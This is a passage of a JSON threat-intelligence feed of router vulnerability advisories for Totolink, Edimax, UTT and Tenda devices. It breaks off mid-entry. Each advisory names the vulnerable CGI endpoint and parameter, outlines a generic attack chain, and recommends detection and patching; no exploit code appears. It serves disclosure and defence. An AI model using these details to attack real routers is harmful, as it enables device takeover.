{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/router/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7749"}],"_cs_exploited":false,"_cs_products":["N300RH 3.2.4-B20220812"],"_cs_severities":["high"],"_cs_tags":["buffer-overflow","router","cve-2026-7749"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in Totolink N300RH router version 3.2.4-B20220812. The vulnerability resides in the \u003ccode\u003esetWanConfig\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, which handles POST requests. An attacker can exploit this vulnerability by manipulating the \u003ccode\u003epriDns\u003c/code\u003e argument in a crafted POST request. The vulnerability allows for remote exploitation, meaning an attacker does not need local access to the device. Public exploits for this vulnerability are already available, increasing the risk of exploitation. 
This vulnerability was published on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink N300RH router running firmware version 3.2.4-B20220812.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003epriDns\u003c/code\u003e argument with a value exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetWanConfig\u003c/code\u003e function processes the \u003ccode\u003epriDns\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003epriDns\u003c/code\u003e value overwrites adjacent memory on the stack, potentially including control flow data.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow by overwriting the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining a shell.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the compromised router to perform lateral movement, exfiltrate data, or establish a persistent backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability can lead to complete compromise of the Totolink N300RH router. An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the router as a pivot point to attack other devices on the network. Given that public exploits are available, a wide range of attackers could potentially exploit this vulnerability. 
The CVSS v3.1 base score is 8.8 (HIGH).\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with abnormally long \u003ccode\u003epriDns\u003c/code\u003e values to detect potential exploitation attempts using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect and block malicious POST requests targeting \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eContact Totolink for a security patch or firmware update to address CVE-2026-7749.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T10:16:01Z","date_published":"2026-05-04T10:16:01Z","id":"/briefs/2026-05-totolink-n300rh-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Totolink N300RH version 3.2.4-B20220812, specifically affecting the setWanConfig function within the /cgi-bin/cstecgi.cgi file, allowing a remote attacker to exploit it by manipulating the priDns argument in a POST request.","title":"Totolink N300RH Buffer Overflow Vulnerability in setWanConfig","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-n300rh-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7750"}],"_cs_exploited":false,"_cs_products":["N300RH 3.2.4-B20220812"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","router","cve","webserver"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, identified as CVE-2026-7750, affects Totolink N300RH router version 3.2.4-B20220812. The vulnerability resides in the \u003ccode\u003esetMacFilterRules\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, which handles POST requests. 
Attackers can exploit this flaw by sending a specially crafted POST request with an overly long \u003ccode\u003emac_address\u003c/code\u003e parameter, triggering a buffer overflow. Successful exploitation allows for arbitrary code execution on the device. The vulnerability is remotely exploitable, and a public exploit is available, increasing the risk of widespread attacks. Defenders should prioritize patching or mitigating this vulnerability to prevent potential compromise of affected devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink N300RH router running firmware version 3.2.4-B20220812.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003emac_address\u003c/code\u003e parameter, injecting a string longer than the buffer allocated for it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetMacFilterRules\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003emac_address\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003emac_address\u003c/code\u003e value overflows the buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite the return address, redirecting execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with the privileges of the web server, allowing the attacker to execute arbitrary commands.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control over the router, potentially using it for further malicious activities such as network pivoting, data exfiltration, or denial-of-service attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7750 allows a remote attacker to execute arbitrary code on the vulnerable Totolink N300RH device. This could lead to a complete compromise of the router, allowing the attacker to control network traffic, steal sensitive information, or use the router as a bot in a larger attack. Given the public availability of the exploit, a large number of unpatched devices could be vulnerable to automated attacks, potentially impacting thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Totolink to address CVE-2026-7750.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect and block suspicious POST requests targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint with excessively long \u003ccode\u003emac_address\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e, focusing on requests with large \u003ccode\u003emac_address\u003c/code\u003e values.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T10:16:01Z","date_published":"2026-05-04T10:16:01Z","id":"/briefs/2026-05-totolink-buffer-overflow/","summary":"A buffer overflow vulnerability exists in Totolink N300RH 3.2.4-B20220812 allowing remote attackers to execute arbitrary code by manipulating the mac_address argument in the setMacFilterRules function of the /cgi-bin/cstecgi.cgi POST request handler.","title":"Totolink N300RH Buffer Overflow Vulnerability 
(CVE-2026-7750)","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7717"}],"_cs_exploited":false,"_cs_products":["WA300 5.2cu.7112_B20190227"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","remote-code-execution","router"],"_cs_type":"threat","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in the Totolink WA300 wireless router, specifically version 5.2cu.7112_B20190227. The vulnerability resides within the \u003ccode\u003eUploadCustomModule\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, a component of the POST Request Handler. The identified vulnerability allows a remote attacker to cause a buffer overflow through manipulation of the \u003ccode\u003eFile\u003c/code\u003e argument within a crafted POST request. Public proof-of-concept exploit code is available, increasing the likelihood of exploitation. This vulnerability poses a significant risk, as successful exploitation could lead to arbitrary code execution, potentially allowing attackers to fully compromise affected devices. 
Defenders should prioritize detection and mitigation strategies to prevent exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Totolink WA300 device running firmware version 5.2cu.7112_B20190227.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a \u003ccode\u003eFile\u003c/code\u003e argument with a payload exceeding the buffer size allocated for the \u003ccode\u003eUploadCustomModule\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eUploadCustomModule\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003eFile\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003eFile\u003c/code\u003e argument overwrites adjacent memory regions, including potentially critical program data and control flow instructions.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow allows the attacker to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access to the device with elevated privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker could then use the compromised device to pivot into the internal network or cause a denial-of-service condition.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability can lead to complete compromise of the affected Totolink WA300 device. An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the device as a bot in a larger attack. Given the high CVSS score of 8.8, the impact is considered critical. 
Home and small business networks using the affected router model are at risk. The vulnerability allows for remote code execution, leading to significant potential for damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Totolink WA300 UploadCustomModule Buffer Overflow Attempt\u003c/code\u003e to detect malicious POST requests targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with unusually large \u003ccode\u003eFile\u003c/code\u003e parameters, as indicated in the Sigma rule.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Totolink to patch CVE-2026-7717 if they become available.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other internal network resources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T01:16:05Z","date_published":"2026-05-04T01:16:05Z","id":"/briefs/2026-05-totolink-wa300-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in the UploadCustomModule function of the /cgi-bin/cstecgi.cgi file in the POST Request Handler component of Totolink WA300 version 5.2cu.7112_B20190227, which can be exploited by manipulating the File argument.","title":"Totolink WA300 Buffer Overflow Vulnerability in UploadCustomModule","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-wa300-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7685"}],"_cs_exploited":false,"_cs_products":["BR-6208AC (\u003c= 1.02)"],"_cs_severities":["critical"],"_cs_tags":["buffer overflow","cve-2026-7685","router","webserver"],"_cs_type":"advisory","_cs_vendors":["Edimax"],"content_html":"\u003cp\u003eA buffer overflow vulnerability, CVE-2026-7685, has been identified in Edimax BR-6208AC routers up to version 
1.02. The vulnerability resides within the \u003ccode\u003e/goform/setWAN\u003c/code\u003e file, specifically related to the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument. Successful exploitation of this flaw could allow a remote attacker to execute arbitrary code or cause a denial-of-service condition. Publicly available exploits exist, increasing the risk of widespread exploitation. The vendor was notified but has not responded. Given the ease of exploitation and the potential for significant impact, this vulnerability poses a critical threat to affected devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an Edimax BR-6208AC router with firmware version 1.02 or earlier exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/setWAN\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument, injecting a payload exceeding the buffer\u0026rsquo;s expected size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s web server processes the malicious request without proper input validation on the size of the \u003ccode\u003epptpDfGateway\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overwrites adjacent memory regions on the stack, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eWhen the function attempts to return, it jumps to an address controlled by the attacker, leading to arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands to gain control of the device, potentially installing malware or modifying router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to 
complete compromise of the Edimax BR-6208AC router. An attacker could leverage this access to perform a variety of malicious activities, including eavesdropping on network traffic, injecting malicious code into web pages served by the router, or using the router as a bot in a larger botnet. Given the availability of public exploits, unpatched devices are at immediate risk of compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Edimax BR-6208AC setWAN Buffer Overflow Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for POST requests to \u003ccode\u003e/goform/setWAN\u003c/code\u003e containing unusually long \u003ccode\u003epptpDfGateway\u003c/code\u003e parameters, as detected by the Sigma rule \u003ccode\u003eDetect Long pptpDfGateway Parameter\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eApply appropriate network segmentation to limit the blast radius of compromised devices and prevent lateral movement.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-03T07:16:25Z","date_published":"2026-05-03T07:16:25Z","id":"/briefs/2026-05-edimax-bo/","summary":"A buffer overflow vulnerability exists in Edimax BR-6208AC devices (\u003c= 1.02) via manipulation of the pptpDfGateway argument in the /goform/setWAN endpoint, potentially allowing remote attackers to execute arbitrary code.","title":"Edimax BR-6208AC Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-edimax-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7546"}],"_cs_exploited":false,"_cs_products":["NR1800X 9.1.0u.6279_B20210910"],"_cs_severities":["critical"],"_cs_tags":["cve","remote code execution","buffer overflow","router"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-7546, 
affects Totolink NR1800X routers running firmware version 9.1.0u.6279_B20210910. The vulnerability resides within the \u003ccode\u003efind_host_ip\u003c/code\u003e function of the lighttpd web server component. By exploiting this flaw, a remote, unauthenticated attacker can trigger a stack-based buffer overflow through manipulation of the Host argument in an HTTP request. The publicly disclosed exploit allows attackers to potentially gain complete control of the device. This vulnerability poses a significant risk to home and small business networks utilizing the affected Totolink router model, as successful exploitation leads to arbitrary code execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink NR1800X router running firmware version 9.1.0u.6279_B20210910.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the router\u0026rsquo;s web interface.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003eHost\u003c/code\u003e header with a string exceeding the buffer size allocated in the \u003ccode\u003efind_host_ip\u003c/code\u003e function within the \u003ccode\u003elighttpd\u003c/code\u003e component.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003elighttpd\u003c/code\u003e server processes the HTTP request and passes the \u003ccode\u003eHost\u003c/code\u003e header value to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efind_host_ip\u003c/code\u003e function attempts to store the oversized \u003ccode\u003eHost\u003c/code\u003e value in a stack-allocated buffer.\u003c/li\u003e\n\u003cli\u003eA stack-based buffer overflow occurs due to the insufficient buffer size.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory on the stack, potentially including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code 
execution on the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7546 allows a remote attacker to execute arbitrary code on the vulnerable Totolink NR1800X device. This can lead to complete control of the router, allowing the attacker to modify router settings, intercept network traffic, or use the compromised router as a pivot point for further attacks within the network. Given the nature of stack-based buffer overflows, the attacker can potentially install persistent backdoors or malware. This presents a significant risk to users, potentially exposing sensitive data and infrastructure to unauthorized access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches released by Totolink to remediate CVE-2026-7546.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious HTTP requests targeting Totolink routers, specifically looking for abnormally long Host headers with the Sigma rule \u0026ldquo;Detect Suspiciously Long Host Header\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eReview and harden router configurations, including disabling remote administration if not required.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T03:16:01Z","date_published":"2026-05-01T03:16:01Z","id":"/briefs/2026-05-totolink-rce/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-7546) in the Totolink NR1800X router allows remote attackers to achieve arbitrary code execution by sending a crafted HTTP request with a manipulated Host header to the vulnerable lighttpd component.","title":"Totolink NR1800X Stack-Based Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7548"}],"_cs_exploited":false,"_cs_products":["NR1800X 9.1.0u.6279_B20210910"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","network"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7548, affects Totolink NR1800X router version 9.1.0u.6279_B20210910. The vulnerability resides within the \u003ccode\u003esub_41A68C\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003esetUssd\u003c/code\u003e argument, a remote attacker can inject arbitrary commands into the system. Publicly available exploit code makes exploitation easier. This vulnerability poses a significant risk as it allows unauthenticated remote attackers to execute arbitrary commands on the affected device, potentially leading to full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink NR1800X device running firmware version 9.1.0u.6279_B20210910.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003esetUssd\u003c/code\u003e argument with a malicious payload designed to inject a command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esub_41A68C\u003c/code\u003e function processes the \u003ccode\u003esetUssd\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed by the system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access and can execute arbitrary commands on the 
device.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the command execution to escalate privileges, install malware, or pivot to other devices on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected Totolink NR1800X router. This could lead to complete compromise of the device, allowing the attacker to control network traffic, modify router settings, or use the router as a pivot point to attack other devices on the network. Given the wide usage of Totolink routers, a large number of devices could be vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command injection attempts in the \u003ccode\u003esetUssd\u003c/code\u003e parameter, using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply available patches provided by Totolink to address the CVE-2026-7548 vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T03:16:01Z","date_published":"2026-05-01T03:16:01Z","id":"/briefs/2026-05-totolink-command-injection/","summary":"A command injection vulnerability exists in Totolink NR1800X version 9.1.0u.6279_B20210910, affecting the function sub_41A68C of the file /cgi-bin/cstecgi.cgi; by manipulating the argument setUssd, a remote attacker can inject commands, and an exploit is publicly available.","title":"Totolink NR1800X Command Injection 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7513"}],"_cs_exploited":false,"_cs_products":["HiPER 1200GW (\u003c= 2.5.3-170306)"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","iot","router","cve"],"_cs_type":"threat","_cs_vendors":["UTT"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in UTT HiPER 1200GW devices with firmware versions up to 2.5.3-170306. The flaw resides within the \u003ccode\u003estrcpy\u003c/code\u003e function of the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e file, which handles remote control functionalities. A remote attacker can exploit this vulnerability by sending a specially crafted request to trigger the buffer overflow, potentially leading to arbitrary code execution on the affected device. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations using the affected UTT HiPER 1200GW devices, as it could allow attackers to gain unauthorized access and control over the device and potentially the network it is connected to.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable UTT HiPER 1200GW device exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a payload designed to overflow the buffer when processed by the \u003ccode\u003estrcpy\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003estrcpy\u003c/code\u003e function within \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e copies the attacker-controlled data without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe 
buffer overflow overwrites adjacent memory regions, potentially including critical program data or execution pointers.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the overflow to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the device, potentially escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised device to pivot to other systems on the network, exfiltrate sensitive data, or cause further damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability could lead to complete compromise of the affected UTT HiPER 1200GW device. Attackers could gain unauthorized access to sensitive data, disrupt device functionality, or use the device as a foothold for further attacks within the network. Given that public exploits are available, the risk of widespread exploitation is high. While the exact number of affected devices is unknown, organizations using UTT HiPER 1200GW devices should take immediate action to mitigate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates from UTT to address the buffer overflow vulnerability in UTT HiPER 1200GW devices.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious requests targeting the \u003ccode\u003e/goform/formRemoteControl\u003c/code\u003e endpoint, and deploy the Sigma rule \u003ccode\u003eDetect Suspicious Requests to FormRemoteControl\u003c/code\u003e to identify potentially malicious activity.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures to prevent buffer overflows in web applications.\u003c/li\u003e\n\u003cli\u003eConsider network segmentation to limit the impact of a compromised device on other systems within the network.\u003c/li\u003e\n\u003cli\u003eReview 
and restrict access to the device\u0026rsquo;s web interface to only authorized personnel.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T00:16:25Z","date_published":"2026-05-01T00:16:25Z","id":"/briefs/2026-05-utt-hiper-buffer-overflow/","summary":"A buffer overflow vulnerability exists in UTT HiPER 1200GW devices up to version 2.5.3-170306, stemming from manipulation of the `strcpy` function in the `/goform/formRemoteControl` file, which allows remote attackers to execute arbitrary code.","title":"UTT HiPER 1200GW Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-utt-hiper-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7470"}],"_cs_exploited":false,"_cs_products":["4G300"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","tenda","router","cve-2026-7470"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda 4G300 routers, specifically version US_4G300V1.0Mt_V1.01.42_CN_TDC01. The vulnerability resides within the \u003ccode\u003esub_427C3C\u003c/code\u003e function located in the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e file. An attacker can exploit this flaw by manipulating the \u003ccode\u003epage\u003c/code\u003e argument in a crafted request, leading to a buffer overflow and potentially allowing for arbitrary code execution on the affected device. 
The vulnerability, identified as CVE-2026-7470, poses a significant risk as remote exploitation is possible, and a proof-of-concept exploit is publicly available, increasing the likelihood of malicious actors leveraging this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda 4G300 router running the vulnerable firmware version US_4G300V1.0Mt_V1.01.42_CN_TDC01.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003esub_427C3C\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request, passing the oversized \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esub_427C3C\u003c/code\u003e function attempts to write the oversized data into a stack-based buffer, causing a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker redirects execution flow to a malicious code payload injected into the request or elsewhere in memory.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with the privileges of the router process, potentially allowing the attacker to gain full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of the Tenda 4G300 router. 
An attacker could gain unauthorized access to the device\u0026rsquo;s configuration, intercept network traffic, or use the router as a launching point for further attacks against other devices on the network or the internet. Given the widespread use of these routers in homes and small businesses, a successful attack could impact a large number of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for unusual POST requests to \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e with abnormally long \u003ccode\u003epage\u003c/code\u003e parameters. Use the provided Sigma rule to detect suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/SafeMacFilter\u003c/code\u003e endpoint to mitigate potential brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply any available patches or firmware updates released by Tenda to address CVE-2026-7470.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T03:16:01Z","date_published":"2026-04-30T03:16:01Z","id":"/briefs/2026-04-tenda-stack-overflow/","summary":"A remote stack-based buffer overflow vulnerability exists in the Tenda 